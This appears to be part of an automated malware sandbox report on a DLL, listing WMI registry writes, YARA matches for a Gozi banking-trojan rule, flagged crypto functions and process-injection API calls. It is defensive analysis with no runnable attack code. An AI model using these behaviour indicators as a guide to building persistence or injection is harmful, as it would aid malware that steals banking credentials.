Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Uses 32bit PE files
Source: 61b85f75e6a7c.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Yara signature match
Source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013E3373 0_2_013E3373
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013E294D 0_2_013E294D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013EB084 0_2_013EB084
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010298C2 0_2_010298C2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010460F4 0_2_010460F4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01035B0C 0_2_01035B0C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010353A6 0_2_010353A6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01027A06 0_2_01027A06
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010492C4 0_2_010492C4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010262CD 0_2_010262CD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01021D4F 0_2_01021D4F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01034F12 0_2_01034F12
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102366D 0_2_0102366D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01031690 0_2_01031690
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0DF9 0_2_013A0DF9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0DF7 0_2_013A0DF7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049DB084 3_2_049DB084
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049D294D 3_2_049D294D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049D3373 3_2_049D3373
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0DF9 3_2_030E0DF9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0DF7 3_2_030E0DF7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C1D4F 3_2_053C1D4F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053D4F12 3_2_053D4F12
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C366D 3_2_053C366D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053D1690 3_2_053D1690
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053E60F4 3_2_053E60F4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C98C2 3_2_053C98C2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053D5B0C 3_2_053D5B0C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053D53A6 3_2_053D53A6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C7A06 3_2_053C7A06
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C62CD 3_2_053C62CD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053E92C4 3_2_053E92C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0DF9 4_2_006D0DF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0DF7 4_2_006D0DF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA1D4F 4_2_04AA1D4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AB1690 4_2_04AB1690
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA366D 4_2_04AA366D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AB4F12 4_2_04AB4F12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AC60F4 4_2_04AC60F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA98C2 4_2_04AA98C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA62CD 4_2_04AA62CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AC92C4 4_2_04AC92C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA7A06 4_2_04AA7A06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AB53A6 4_2_04AB53A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AB5B0C 4_2_04AB5B0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02B9B084 5_2_02B9B084
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02B93373 5_2_02B93373
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02B9294D 5_2_02B9294D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0DF9 5_2_02BF0DF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0DF7 5_2_02BF0DF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C21D4F 5_2_04C21D4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C31690 5_2_04C31690
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C2366D 5_2_04C2366D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C34F12 5_2_04C34F12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C298C2 5_2_04C298C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C460F4 5_2_04C460F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C492C4 5_2_04C492C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C262CD 5_2_04C262CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C27A06 5_2_04C27A06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C353A6 5_2_04C353A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C35B0C 5_2_04C35B0C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2F83C 42_2_00E2F83C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E3A2AC 42_2_00E3A2AC
Source: C:\Windows\System32\control.exe Code function: 42_2_00E29CD4 42_2_00E29CD4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E258F8 42_2_00E258F8
Source: C:\Windows\System32\control.exe Code function: 42_2_00E268CC 42_2_00E268CC
Source: C:\Windows\System32\control.exe Code function: 42_2_00E3C094 42_2_00E3C094
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2F074 42_2_00E2F074
Source: C:\Windows\System32\control.exe Code function: 42_2_00E32844 42_2_00E32844
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1C85C 42_2_00E1C85C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1E028 42_2_00E1E028
Source: C:\Windows\System32\control.exe Code function: 42_2_00E26028 42_2_00E26028
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2D9D4 42_2_00E2D9D4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E3B984 42_2_00E3B984
Source: C:\Windows\System32\control.exe Code function: 42_2_00E37160 42_2_00E37160
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2A120 42_2_00E2A120
Source: C:\Windows\System32\control.exe Code function: 42_2_00E23A7C 42_2_00E23A7C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E20210 42_2_00E20210
Source: C:\Windows\System32\control.exe Code function: 42_2_00E193D0 42_2_00E193D0
Source: C:\Windows\System32\control.exe Code function: 42_2_00E3CB9C 42_2_00E3CB9C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E21B60 42_2_00E21B60
Source: C:\Windows\System32\control.exe Code function: 42_2_00E11B44 42_2_00E11B44
Source: C:\Windows\System32\control.exe Code function: 42_2_00E3EB2C 42_2_00E3EB2C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1C30C 42_2_00E1C30C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E38CE4 42_2_00E38CE4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E134F4 42_2_00E134F4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2DCBC 42_2_00E2DCBC
Source: C:\Windows\System32\control.exe Code function: 42_2_00E24C84 42_2_00E24C84
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2B408 42_2_00E2B408
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1C5EC 42_2_00E1C5EC
Source: C:\Windows\System32\control.exe Code function: 42_2_00E335C4 42_2_00E335C4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E24D80 42_2_00E24D80
Source: C:\Windows\System32\control.exe Code function: 42_2_00E3159C 42_2_00E3159C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E35D64 42_2_00E35D64
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2457C 42_2_00E2457C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E3FEE8 42_2_00E3FEE8
Source: C:\Windows\System32\control.exe Code function: 42_2_00E296D0 42_2_00E296D0
Source: C:\Windows\System32\control.exe Code function: 42_2_00E236D4 42_2_00E236D4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2A6A4 42_2_00E2A6A4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E13EB8 42_2_00E13EB8
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1B60C 42_2_00E1B60C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1BE10 42_2_00E1BE10
Source: C:\Windows\System32\control.exe Code function: 42_2_00E40F98 42_2_00E40F98
Source: C:\Windows\System32\control.exe Code function: 42_2_00E37F9C 42_2_00E37F9C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1F83C 43_2_00E1F83C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E2A2AC 43_2_00E2A2AC
Source: C:\Windows\System32\control.exe Code function: 43_2_00E19CD4 43_2_00E19CD4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E158F8 43_2_00E158F8
Source: C:\Windows\System32\control.exe Code function: 43_2_00E168CC 43_2_00E168CC
Source: C:\Windows\System32\control.exe Code function: 43_2_00E2C094 43_2_00E2C094
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1F074 43_2_00E1F074
Source: C:\Windows\System32\control.exe Code function: 43_2_00E22844 43_2_00E22844
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0C85C 43_2_00E0C85C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0E028 43_2_00E0E028
Source: C:\Windows\System32\control.exe Code function: 43_2_00E16028 43_2_00E16028
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1D9D4 43_2_00E1D9D4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E2B984 43_2_00E2B984
Source: C:\Windows\System32\control.exe Code function: 43_2_00E27160 43_2_00E27160
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1A120 43_2_00E1A120
Source: C:\Windows\System32\control.exe Code function: 43_2_00E13A7C 43_2_00E13A7C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E10210 43_2_00E10210
Source: C:\Windows\System32\control.exe Code function: 43_2_00E093D0 43_2_00E093D0
Source: C:\Windows\System32\control.exe Code function: 43_2_00E2CB9C 43_2_00E2CB9C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E11B60 43_2_00E11B60
Source: C:\Windows\System32\control.exe Code function: 43_2_00E01B44 43_2_00E01B44
Source: C:\Windows\System32\control.exe Code function: 43_2_00E2EB2C 43_2_00E2EB2C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0C30C 43_2_00E0C30C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E28CE4 43_2_00E28CE4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E034F4 43_2_00E034F4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1DCBC 43_2_00E1DCBC
Source: C:\Windows\System32\control.exe Code function: 43_2_00E14C84 43_2_00E14C84
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1B408 43_2_00E1B408
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0C5EC 43_2_00E0C5EC
Source: C:\Windows\System32\control.exe Code function: 43_2_00E235C4 43_2_00E235C4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E14D80 43_2_00E14D80
Source: C:\Windows\System32\control.exe Code function: 43_2_00E2159C 43_2_00E2159C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E25D64 43_2_00E25D64
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1457C 43_2_00E1457C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E2FEE8 43_2_00E2FEE8
Source: C:\Windows\System32\control.exe Code function: 43_2_00E196D0 43_2_00E196D0
Source: C:\Windows\System32\control.exe Code function: 43_2_00E136D4 43_2_00E136D4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1A6A4 43_2_00E1A6A4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E03EB8 43_2_00E03EB8
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0B60C 43_2_00E0B60C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0BE10 43_2_00E0BE10
Source: C:\Windows\System32\control.exe Code function: 43_2_00E30F98 43_2_00E30F98
Source: C:\Windows\System32\control.exe Code function: 43_2_00E27F9C 43_2_00E27F9C
Source: C:\Windows\System32\control.exe Code function: 45_2_0083F83C 45_2_0083F83C
Source: C:\Windows\System32\control.exe Code function: 45_2_0084A2AC 45_2_0084A2AC
Source: C:\Windows\System32\control.exe Code function: 45_2_00839CD4 45_2_00839CD4
Source: C:\Windows\System32\control.exe Code function: 45_2_0084C094 45_2_0084C094
Source: C:\Windows\System32\control.exe Code function: 45_2_008368CC 45_2_008368CC
Source: C:\Windows\System32\control.exe Code function: 45_2_008358F8 45_2_008358F8
Source: C:\Windows\System32\control.exe Code function: 45_2_0082E028 45_2_0082E028
Source: C:\Windows\System32\control.exe Code function: 45_2_00836028 45_2_00836028
Source: C:\Windows\System32\control.exe Code function: 45_2_00842844 45_2_00842844
Source: C:\Windows\System32\control.exe Code function: 45_2_0082C85C 45_2_0082C85C
Source: C:\Windows\System32\control.exe Code function: 45_2_0083F074 45_2_0083F074
Source: C:\Windows\System32\control.exe Code function: 45_2_0084B984 45_2_0084B984
Source: C:\Windows\System32\control.exe Code function: 45_2_0083D9D4 45_2_0083D9D4
Source: C:\Windows\System32\control.exe Code function: 45_2_0083A120 45_2_0083A120
Source: C:\Windows\System32\control.exe Code function: 45_2_00847160 45_2_00847160
Source: C:\Windows\System32\control.exe Code function: 45_2_00830210 45_2_00830210
Source: C:\Windows\System32\control.exe Code function: 45_2_00833A7C 45_2_00833A7C
Source: C:\Windows\System32\control.exe Code function: 45_2_0084CB9C 45_2_0084CB9C
Source: C:\Windows\System32\control.exe Code function: 45_2_008293D0 45_2_008293D0
Source: C:\Windows\System32\control.exe Code function: 45_2_0082C30C 45_2_0082C30C
Source: C:\Windows\System32\control.exe Code function: 45_2_0084EB2C 45_2_0084EB2C
Source: C:\Windows\System32\control.exe Code function: 45_2_00821B44 45_2_00821B44
Source: C:\Windows\System32\control.exe Code function: 45_2_00831B60 45_2_00831B60
Source: C:\Windows\System32\control.exe Code function: 45_2_00834C84 45_2_00834C84
Source: C:\Windows\System32\control.exe Code function: 45_2_0083DCBC 45_2_0083DCBC
Source: C:\Windows\System32\control.exe Code function: 45_2_00848CE4 45_2_00848CE4
Source: C:\Windows\System32\control.exe Code function: 45_2_008234F4 45_2_008234F4
Source: C:\Windows\System32\control.exe Code function: 45_2_0083B408 45_2_0083B408
Source: C:\Windows\System32\control.exe Code function: 45_2_00834D80 45_2_00834D80
Source: C:\Windows\System32\control.exe Code function: 45_2_0084159C 45_2_0084159C
Source: C:\Windows\System32\control.exe Code function: 45_2_008435C4 45_2_008435C4
Source: C:\Windows\System32\control.exe Code function: 45_2_0082C5EC 45_2_0082C5EC
Source: C:\Windows\System32\control.exe Code function: 45_2_00845D64 45_2_00845D64
Source: C:\Windows\System32\control.exe Code function: 45_2_0083457C 45_2_0083457C
Source: C:\Windows\System32\control.exe Code function: 45_2_0083A6A4 45_2_0083A6A4
Source: C:\Windows\System32\control.exe Code function: 45_2_00823EB8 45_2_00823EB8
Source: C:\Windows\System32\control.exe Code function: 45_2_008396D0 45_2_008396D0
Source: C:\Windows\System32\control.exe Code function: 45_2_008336D4 45_2_008336D4
Source: C:\Windows\System32\control.exe Code function: 45_2_0084FEE8 45_2_0084FEE8
Source: C:\Windows\System32\control.exe Code function: 45_2_0082B60C 45_2_0082B60C
Source: C:\Windows\System32\control.exe Code function: 45_2_0082BE10 45_2_0082BE10
Source: C:\Windows\System32\control.exe Code function: 45_2_00847F9C 45_2_00847F9C
Source: C:\Windows\System32\control.exe Code function: 45_2_00850F98 45_2_00850F98
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01038A31 CreateProcessAsUserW, 0_2_01038A31
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013E7562 GetProcAddress,NtCreateSection,memset, 0_2_013E7562
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013E65B4 NtMapViewOfSection, 0_2_013E65B4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013E6C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_013E6C06
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013EB2A9 NtQueryVirtualMemory, 0_2_013EB2A9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010309CA NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_010309CA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103D9F4 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 0_2_0103D9F4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102B0A5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_0102B0A5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103C51B memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 0_2_0103C51B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102D551 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 0_2_0102D551
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01044582 NtQueryInformationProcess, 0_2_01044582
